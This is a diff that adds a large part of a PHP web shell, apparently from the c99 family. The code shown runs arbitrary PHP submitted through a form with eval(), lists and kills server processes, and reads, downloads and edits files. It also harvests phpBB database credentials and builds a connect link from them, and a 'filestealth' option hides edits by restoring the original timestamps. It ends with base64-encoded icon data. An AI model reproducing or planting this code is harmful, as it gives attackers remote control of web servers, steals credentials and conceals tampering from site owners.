+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>";
+  if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = myshellexec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) {$processes_sort = $sort_default;}
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) {
+      if ($pid) {
+        if (is_null($sig)) {$sig = 9;}
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) {echo "OK.";}
+        else {echo "ERROR.";}
+      }
+      while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+      }
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          echo "<tr>";
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+          echo "</tr>";
+        }
+      }
+    }
+    //For Windows - Fixed By dhie-Q
+    else {
+      while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+      while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      ob_clean();
+      eval($eval);
+      $ret = ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {c99shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
